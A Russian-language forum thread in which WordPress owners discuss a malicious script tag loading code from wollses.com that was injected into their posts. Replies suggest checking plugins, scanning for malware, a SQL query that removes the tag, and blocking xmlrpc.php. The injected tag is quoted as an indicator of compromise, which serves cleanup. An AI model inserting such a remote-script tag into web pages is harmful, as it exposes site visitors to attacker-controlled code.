[Sluchay]

На одном из сайтов wp, во всех записях проставился вот такой код <script src="//wollses.com/steps"></script>.
Код появился в разных местах статьи, где-то в центре, где-то в конце статьи. Может кто сталкивался.

[Shinigami]

Вот тут написано что это.
Вот тут написано как лечить.

[fizmatik]

Sluchay, не нашел как решить?

https://wordpress.org/support/topic/...-vulnerability тут парень говорит, что проблема в новой версии плагина https://wordpress.org/plugins/shortcodes-ultimate/, но у меня нет такого плагина, а проблема есть

Shinigami, я так понимаю ты разобрался в вопросе. Если не трудно объясни, что это и откуда берётся

[Feanor184]

fizmatik, Если есть подозрение не плагин, для начала - отключи все плагины и проверь, отсталось или нет. Если убралось - дальше методом проб "по одному" включай и смотри. Обычно проблема или в плагине, или в теме - которую взяли непонятно откуда)

[fizmatik]

Feanor184, я так сразу и сделал, но код уже прописан в тексте старых статей, при чем не во всех, а как-то рандомно и он не пропадает при отключении всех плагинов и с дефолтной темой.

удалить я думаю все найденные вхождения запросом в бд, но хотелось бы найти источник этой гадости

[Feanor184]

fizmatik, тогда вам стоит прогнать сайт на вредонос - желательно локальную копию скачанную.

[antichatakk]

такая же проблема...

[garhar]

Сегодня обнаружил с десяток таких исходящих ссылок на одном из сайтов.
Вот решение:
В phpmyadmin надо прописать следующий SQL запрос:

Код:

UPDATE wp_posts
SET post_content = REPLACE (post_content, '<script src="//wollses.com/steps"></script>', '')

А затем, для защиты в .htaccess прописать:

Код:

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

[Myroslav]

Действительно, проблемма с годами не пропала. Инога меняется скрипт. У меня

Код:

wollses.com/steps.png

Чистил так же как советовали в предыдущем посте.